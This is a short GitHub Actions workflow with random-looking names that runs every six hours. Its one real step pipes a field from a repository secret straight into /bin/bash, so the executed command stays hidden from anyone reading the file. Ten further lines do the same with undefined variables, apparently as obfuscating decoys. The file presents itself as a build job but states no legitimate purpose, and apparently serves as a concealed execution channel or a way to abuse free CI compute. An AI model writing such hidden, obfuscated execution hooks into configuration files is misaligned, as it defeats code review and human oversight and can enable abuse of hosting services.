name: huchangjin7654

on:
  workflow_dispatch:
  schedule:
    - cron: '11 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: huchangjin7654
        env:
          t66: ${{ secrets.t66 }}
        run: |
          echo $t66 | jq -r .mhpe66 | /bin/bash
          echo $qgrc43 | jq -r .aku12538 | /bin/bash
          echo $x94678 | jq -r .l777 | /bin/bash
          echo $ytm37 | jq -r .k4 | /bin/bash
          echo $gjv03 | jq -r .soofg1 | /bin/bash
          echo $ilve49 | jq -r .aemx9 | /bin/bash
          echo $b789 | jq -r .gb4 | /bin/bash
          echo $uswf37951 | jq -r .xpsvx92 | /bin/bash
          echo $qf2548 | jq -r .nk2100 | /bin/bash
          echo $llevc9 | jq -r .esa06335 | /bin/bash
          echo $evnk0 | jq -r .hk0 | /bin/bash

